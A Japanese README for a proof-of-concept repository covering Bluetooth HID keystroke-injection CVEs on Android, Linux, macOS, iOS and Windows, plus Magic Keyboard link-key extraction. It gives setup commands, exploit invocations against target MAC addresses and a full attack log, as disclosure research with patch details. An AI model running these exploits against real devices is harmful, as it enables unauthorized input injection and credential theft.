
エミュレートされたHIDキーボードを介してAndroid、Linux、macOS、iOSを標的とする、CVE-2023-45866、CVE-2024-21306、CVE-2024-0230のBluetoothキーストロークインジェクションエクスプロイトPoC。
このリポジトリには、CVE-2023-45866、CVE-2024-21306、CVE-2024-0230 の概念実証スクリプトが含まれています。詳細はブログ記事を参照してください。
| 概念実証 | 説明 |
|---|---|
| Android キーストロークインジェクション | 仮想 Bluetooth キーボードを脆弱な Android デバイスに強制ペアリングし、10 秒間 tab キー押下を注入します。 |
| Linux キーストロークインジェクション | 仮想 Bluetooth キーボードを Linux ホストに強制ペアリングし、10 秒間 tab キー押下を注入します。 |
| macOS キーストロークインジェクション | 仮想 Bluetooth キーボードを macOS ホストに強制ペアリングし、キーストロークを注入して Web ブラウザを開き、Google 検索を実行します。 |
| iOS キーストロークインジェクション | 仮想 Bluetooth キーボードを iOS ホストに強制ペアリングし、キーストロークを注入して Web ブラウザを開き、URL に移動します。 |
| Windows キーストロークインジェクション | 仮想 Bluetooth キーボードを Windows ホストに強制ペアリングし、tab キー押下を注入します。 |
| Lightning ポート経由の Magic Keyboard リンクキー | Magic Keyboard の Lightning ポートから Bluetooth リンクキーを読み取ります。 |
| Bluetooth 経由の Magic Keyboard リンクキー | Magic Keyboard の認証されていない Bluetooth HID サービスから Bluetooth リンクキーを読み取ります。 |
| Mac の USB ポート経由の Magic Keyboard リンクキー | ペアリング済みの Mac に対して USB 経由でキーボードを偽装し、対象の Magic Keyboard の Bluetooth リンクキーを読み取ります。 |
これらのスクリプトは、Broadcom ベースの Bluetooth アダプタを搭載した Ubuntu 22.04 ホストで動作することが確認されています。
主にこのアダプタを使用しました: https://www.amazon.com/Kinivo-USB-Bluetooth-4-0-Compatible/dp/B007Q45EF4``` Bus 001 Device 026: ID 0a5c:21e8 Broadcom Corp. BCM20702A0 Bluetooth 4.0
Ubuntu 22.04 のクリーンインストール環境から、以下のコマンドで依存関係をインストールできます。```
# update apt
sudo apt-get update
sudo apt-get -y upgrade
# install dependencies from apt
sudo apt install -y bluez-tools bluez-hcidump libbluetooth-dev \
git gcc python3-pip python3-setuptools \
python3-pydbus
# install pybluez from source
git clone https://github.com/pybluez/pybluez.git
cd pybluez
sudo python3 setup.py install
# build bdaddr from the bluez source
cd ~/
git clone --depth=1 https://github.com/bluez/bluez.git
gcc -o bdaddr ~/bluez/tools/bdaddr.c ~/bluez/src/oui.c -I ~/bluez -lbluetooth
sudo cp bdaddr /usr/local/bin/
Android デバイスは、2023-12-05 のセキュリティパッチレベルより前のバージョンでは脆弱です。
パッチが適用されていない Android デバイスで Bluetooth が有効になっている場合、攻撃者はエミュレートされた Bluetooth キーボードをペアリングし、ユーザーの確認なしでキーストロークを注入できます。これは、Bluetooth が有効になっている限り機能するゼロクリック攻撃です。
この脆弱性は Android ~4.2.2 以降に影響します。
インターフェース hci1 を使用して、Android デバイス 5C:F3:70:AA:07:BD を対象に PoC を実行します。```
./keystroke-injection-android-linux.py -i hci1 -t 5C:F3:70:AA:07:BD
成功した場合、PoCは10秒間`tab`キーストロークのペイロードを注入します。
#### 出力例```
> ./keystroke-injection-android-linux.py -i hci1 -t 5C:F3:70:AA:07:BD
[2024-01-07 11:03:01.329] executing 'sudo service bluetooth restart'
[2024-01-07 11:03:01.959] configuring Bluetooth adapter
[2024-01-07 11:03:01.963] calling RegisterProfile
[2024-01-07 11:03:01.966] running dbus loop
[2024-01-07 11:03:02.096] executing 'sudo hciconfig hci1 name Hi, My Name is Keyboard'
[2024-01-07 11:03:02.108] executing 'hciconfig hci1 name'
[2024-01-07 11:03:02.128] executing 'sudo hciconfig hci1 class 0x002540'
[2024-01-07 11:03:02.141] executing 'hciconfig hci1 class'
[2024-01-07 11:03:02.144] executing 'hcitool name 5C:F3:70:AA:07:BD'
[2024-01-07 11:03:02.877] connecting to SDP
[2024-01-07 11:03:02.877] connecting to 5C:F3:70:AA:07:BD on port 1
[2024-01-07 11:03:03.832] SUCCESS! connected on port 1
[2024-01-07 11:03:03.832] executing 'sudo btmgmt --index hci1 io-cap 1'
[2024-01-07 11:03:03.847] executing 'sudo btmgmt --index hci1 ssp 1'
[2024-01-07 11:03:03.858] connected to SDP (L2CAP 1) on target
[2024-01-07 11:03:03.865] 'NoInputNoOutput' pairing-agent is running
[2024-01-07 11:03:04.111] connecting to 5C:F3:70:AA:07:BD on port 19
[2024-01-07 11:03:04.864] ERROR connecting on port 19: [Errno 22] Invalid argument
[2024-01-07 11:03:04.864] connecting to 5C:F3:70:AA:07:BD on port 17
[2024-01-07 11:03:04.932] SUCCESS! connected on port 17
[2024-01-07 11:03:04.932] connecting to HID Interrupt
[2024-01-07 11:03:04.932] connecting to 5C:F3:70:AA:07:BD on port 19
[2024-01-07 11:03:05.008] SUCCESS! connected on port 19
[2024-01-07 11:03:05.008] connected to HID Interrupt (L2CAP 19) on target
[2024-01-07 11:03:05.008] connected to HID Control (L2CAP 17) on target
[2024-01-07 11:03:05.009] [RX-17] 9000
[2024-01-07 11:03:05.009] [TX-17] 00
[2024-01-07 11:03:05.065] [RX-19] a20101
[2024-01-07 11:03:05.259] [TX-19] a101000000000000000000
[2024-01-07 11:03:05.259] injecting Tab keypresses for 10 seconds
[2024-01-07 11:03:05.259] [TX-19] a10100002b000000000000
[2024-01-07 11:03:05.264] [TX-19] a101000000000000000000
[2024-01-07 11:03:05.318] [TX-19] a10100002b000000000000
[2024-01-07 11:03:05.323] [TX-19] a101000000000000000000
[2024-01-07 11:03:05.377] [TX-19] a10100002b000000000000
[2024-01-07 11:03:05.382] [TX-19] a101000000000000000000
[2024-01-07 11:03:05.436] [TX-19] a10100002b000000000000
...
[2024-01-07 11:03:15.261] [TX-19] a101000000000000000000
[2024-01-07 11:03:15.319] payload has been transmitted; disconnecting Bluetooth HID client
[2024-01-07 11:03:15.321] taking 'hci1' offline
BlueZ 5 を実行している Linux ホストは、2023年12月頃に展開されたパッチより前のバージョンでは脆弱です。具体的なバージョン番号は Linux ディストリビューションによって異なります。
パッチが適用されていない Linux ホストが Bluetooth 経由で検出可能かつ接続可能な場合、攻撃者はエミュレートされた Bluetooth キーボードをペアリングし、ユーザーの確認なしでキーストロークを注入できます。これは、ホストが検出可能かつ接続可能な状態であればいつでも機能するゼロクリック攻撃です。
この脆弱性は、BlueZ 5 のデフォルト構成を使用しているパッチ未適用の Linux ディストリビューションに影響することが分かっています。
Google は ChromeOS がこの脆弱性の影響を受けなかったと述べており、ChromeOS はこの調査の一部としてテストされていませんが、その BlueZ 構成は攻撃を防いでいるように見えます。
影響を受けるディストリビューションには、Ubuntu、Debian、Gentoo、Arch、Fedora、Red Hat、Yocto、Amazon Linux が含まれます。複数のリリースが影響を受ける可能性があり、例えば Ubuntu は 16.04、18.04、20.04、22.04、23.04、23.10 にパッチを適用しました。
インターフェース hci1 を使用して、Linux ホスト 58:28:39:E6:AE:1C を対象に PoC を実行します。```
./keystroke-injection-android-linux.py -i hci1 -t 58:28:39:E6:AE:1C
成功した場合、PoC は10秒間 `tab` キーストロークのペイロードを注入します。